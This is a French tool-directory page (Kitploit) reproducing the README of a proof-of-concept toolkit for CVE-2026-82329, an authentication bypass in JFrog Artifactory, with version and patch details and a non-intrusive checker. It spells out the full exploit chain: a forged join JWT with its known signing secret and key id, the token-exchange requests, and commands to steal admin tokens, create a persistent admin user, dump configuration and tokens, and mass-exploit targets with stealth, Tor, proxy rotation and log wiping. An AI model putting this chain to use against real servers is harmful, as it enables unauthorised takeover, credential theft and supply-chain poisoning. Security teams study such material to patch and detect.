Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-82329-PoC-Exploit — Boîte à outils d'exploitation et de détection pour CVE-2026-82329, un contournement d'authentification de JFrog Artifactory. Forge des JWT join pour générer des jetons d'administration ; inclut un vérificateur de version non intrusif. | Kitploit
Outils/GitHubGitHub/tc4dy/cve-2026-82329-poc-exploit
Outils DéfensifsScanners de VulnérabilitésGénération de PayloadsExploitationExploitation d'Applications WebCollecte d'InformationsVirtualisation de SécuritéTests d'IntrusionAuthentification

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Red Teaming
GitHubtc4dy/cve-2026-82329-poc-exploit

CVE-2026-82329-PoC-Exploit

Boîte à outils d'exploitation et de détection pour CVE-2026-82329, un contournement d'authentification de JFrog Artifactory. Forge des JWT join pour générer des jetons d'administration ; inclut un vérificateur de version non intrusif.

Voir le dépôt
il y a 10h 35mPas encore vérifié
Partager

CVEPoC

CVE‑2026‑82329 – Boîte à outils de contournement d'authentification JFrog Artifactory

Python 3.8+ CVSS Author Artifactory

USAGE ÉTHIQUE UNIQUEMENT – TESTS DE SÉCURITÉ AUTORISÉS Ce dépôt fournit des outils destinés exclusivement aux professionnels de la sécurité autorisés, aux blue teams et aux testeurs d'intrusion. Tout accès non autorisé à des systèmes informatiques est illégal en vertu du CFAA (États-Unis), du Computer Misuse Act (Royaume-Uni), du TCK 243/244 (Turquie) et de lois similaires dans le monde entier.


📖 Aperçu de la vulnérabilité

CVE‑2026‑82329 est une vulnérabilité critique de contournement d'authentification dans JFrog Artifactory auto-hébergé (versions 7.111.x à 7.161.x) qui permet à un attaquant non authentifié d'obtenir un jeton d'administrateur complet de la plateforme en abusant du mécanisme de jonction de cluster JFrog Access.

Fonctionnement

  1. Confiance dans une clé de jonction vide – JFrog Access fait confiance à une clé de jonction fantôme dont la valeur est une chaîne vide. Son secret de signature est donc la valeur déterministe 32 * 0x20 (espaces).
  2. JWT de jonction forgé – un attaquant forge un JWT HS256 signé avec ce secret connu et kid = SHA256("").
  3. Jeton SERVICE émis – POST /access/api/v1/registry/join renvoie un jeton SERVICE avec scp=admin sans aucune authentification.
  4. Échange de jeton admin – POST /access/api/v1/tokens avec scope=applied-permissions/admin&audience=* produit un jeton d'administrateur complet de la plateforme.
  5. Impact – prise de contrôle complète du dépôt, vol de jetons, création d'utilisateurs administrateurs, empoisonnement d'artefacts, attaques de chaîne d'approvisionnement et mouvement latéral vers les services connectés (Xray, Mission Control, Distribution). Mettez à jour immédiatement !

Versions affectées

  • 7.111.4 – 7.111.20 – vulnérable
  • 7.117.0 – 7.117.27 – vulnérable
  • 7.125.0 – 7.125.19 – vulnérable
  • 7.133.0 – 7.133.28 – vulnérable
  • 7.146.0 – 7.146.36 – vulnérable
  • 7.161.0 – 7.161.19 – vulnérable

Correctif

  • Mettez à jour vers 7.111.21, 7.117.28, 7.125.20, 7.133.29, 7.146.38 ou 7.161.20 ou une version ultérieure.
  • Si la mise à jour n'est pas possible, restreignez l'accès réseau à Artifactory (ne l'exposez jamais à Internet) et renouvelez tous les jetons d'administrateur comme solution de contournement temporaire.

🧰 Outils

OutilObjectifUtilisateur visé
exploit.pyBoîte à outils complète et weaponisée avec forge de JWT, échange de jeton admin, création d'utilisateur admin, scan de masse, mode furtif, rotation de proxy, menu interactif et chaîne d'attaque complète.Red teams / pentesters autorisés
safechecker.pyVérificateur de vulnérabilité non intrusif qui détecte la version d'Artifactory, valide l'exposition et évalue le risque sans obtenir de jeton ni exécuter de payload. Génère des rapports JSON.Blue teams / auditeurs de sécurité

📊 Comparaison des fonctionnalités

Fonctionnalitéexploit.pysafechecker.py
Détection de vulnérabilité✅✅
Détection de version✅✅
JWT de jonction forgé✅❌
Émission de jeton de service✅❌
Échange de jeton admin✅❌
Création d'utilisateur admin✅❌
Lister les dépôts✅❌
Lister les utilisateurs✅❌
Vider la configuration✅❌
Vider les jetons✅❌
Chaîne d'attaque complète✅❌
Menu interactif✅❌
Scan de masse (multi-thread)✅✅
Prise en charge de proxy✅✅
Rotation de proxy✅❌
Prise en charge de Tor (anonymat)✅❌
Rotation de User‑Agent (OPSEC)✅❌
Jitter (OPSEC)✅❌
Limiteur de débit adaptatif✅❌
Mode non intrusif (sûr)❌✅
Rapport de version✅✅
Vérification d'accès anonyme❌✅
Rapport JSON

🎯 Résumé des cas d'usage

ScénarioOutil recommandé
Blue Team – vérifier si votre Artifactory est vulnérablesafechecker.py
Audit de sécurité – évaluation de vulnérabilité non intrusivesafechecker.py
Red Team – test d'intrusion autorisé avec exploitation complèteexploit.py
Bug Bounty – test de divulgation responsablesafechecker.py
Scan de masse – vérification de plusieurs cibles pour la vulnérabilitéexploit.py (détection uniquement)
Réponse à incident – vérifier si les systèmes sont compromissafechecker.py

⚙️ Installation

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-82329-PoC-Exploit
cd CVE-2026-82329-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
curl_cffi

📋 Paramètres

Paramètres de exploit.py

ParamètreDescription
-u, --urlURL Artifactory cible unique (ex. http://artifactory.example.com:8082)
-f, --fileFichier contenant la liste des cibles (une par ligne) pour le scan de masse
--create-adminCréer un utilisateur admin persistant (format : USER:PASS)
--keep-adminConserver l'utilisateur admin créé (ne pas nettoyer après le scan)
--token-onlyAfficher uniquement le jeton admin (cible unique)
--interactiveMenu interactif après exploitation
--service-idID de service pour le JWT de jonction (par défaut : jfrt@01)
-t, --threadsNombre de threads pour multi-cibles (par défaut : 10)
--timeoutDélai d'expiration des requêtes (par défaut : 25s)
--retryNombre maximal de tentatives (par défaut : 3)
--proxyProxy HTTP/HTTPS (ex. http://127.0.0.1:8080)
--proxy-listFichier avec les proxys pour rotation (un par ligne)
--jitterJitter aléatoire (0‑2 sec) entre les requêtes
--stealthActiver le mode furtif (rotation UA + X‑Forwarded‑For)
--curl-cffiUtiliser curl_cffi pour l'usurpation d'empreinte TLS
--fullAttaque complète : tous les modules
--dump-configVider la configuration système
--dump-tokensVider tous les jetons d'accès
--list-reposLister les dépôts
--list-usersLister les utilisateurs

Paramètres de safechecker.py

ParamètreDescription
-u, --urlURL Artifactory cible unique (ex. http://artifactory.example.com:8082)
-f, --fileFichier contenant la liste des cibles (une par ligne)
-t, --threadsNombre de threads pour multi-cibles (par défaut : 5)
--timeoutDélai d'expiration des requêtes (par défaut : 10s)
-v, --verboseSortie verbeuse
-o, --outputEnregistrer le rapport JSON dans un fichier

💥 Scénarios

#ScénarioCommande
1Vérification rapide de vulnérabilitépython safechecker.py -u http://artifactory.example.com:8082
2Scan détaillé avec rapportpython safechecker.py -u http://artifactory.example.com:8082 -o report.json -v
3Audit de masse depuis un fichierpython safechecker.py -f targets.txt -t 10 -o audit.json
4Exploit en détection uniquementpython exploit.py -u http://artifactory.example.com:8082 --detect
5Obtenir uniquement le jeton adminpython exploit.py -u http://artifactory.example.com:8082 --token-only
6Attaque complète avec menu interactifpython exploit.py -u http://artifactory.example.com:8082 --interactive
7Créer un utilisateur admin persistantpython exploit.py -u http://artifactory.example.com:8082 --create-admin evil:P@ssw0rd1 --keep-admin
8Vider la configurationpython exploit.py -u http://artifactory.example.com:8082 --dump-config
9Lister les dépôts et les utilisateurspython exploit.py -u http://artifactory.example.com:8082 --list-repos --list-users
10Exploit de masse avec furtivitépython exploit.py -f targets.txt -t 20 --stealth --jitter --full -o results.json
11Rotation de proxy avec Torpython exploit.py -f targets.txt --proxy-list proxies.txt --curl-cffi --stealth

🧪 Point de terminaison et chaîne d'exploitation

L'exploit utilise les points de terminaison JFrog et les étapes d'exploitation suivants :

ÉtapeMéthodePoint de terminaisonDescription
1. JonctionPOST/access/api/v1/registry/joinJWT HS256 forgé → jeton SERVICE (scp=admin)
2. ÉchangePOST/access/api/v1/tokensJeton SERVICE → jeton admin de plateforme
3. PreuveGET/artifactory/api/system/configurationPreuve d'accès réservée aux admins
4. PersistancePUT/artifactory/api/security/users/{user}Créer un utilisateur admin persistant
5. RévocationDELETE/access/api/v1/tokens/{id}Nettoyer les jetons créés

Format du payload

root@kitploit:~
# Structure du JWT de jonction forgé
{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "iat": <unix_timestamp>,
  "service_id": "jfrt@01",
  "kid": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
  "skip_node_registration": true
}

# Secret de signature
secret = b"\x20" * 32

# Requête de jeton admin
scope=applied-permissions/admin&audience=*&expires_in=0&refreshable=false

🛡️ Utilisation responsable

  • N'utilisez ces outils que sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite de test.
  • Tout accès non autorisé est illégal et contraire à l'éthique.
  • Les auteurs ne sont pas responsables de toute utilisation abusive.
  • Respectez toujours les lois et réglementations de votre pays.

Ce logiciel est fourni à des fins éducatives et de tests de sécurité autorisés uniquement.

Télécharger l’outil
✅
✅
Nettoyage des journaux (anti-forensique)✅❌
User‑Agent personnalisé✅✅
Contrôle de vérification SSL✅✅
--detect
Détection uniquement (pas d'échange de jeton admin)
--exploitEffectuer l'exploitation complète
-o, --outputEnregistrer le rapport JSON dans un fichier
-v, --verboseSortie verbeuse
-q, --quietMode silencieux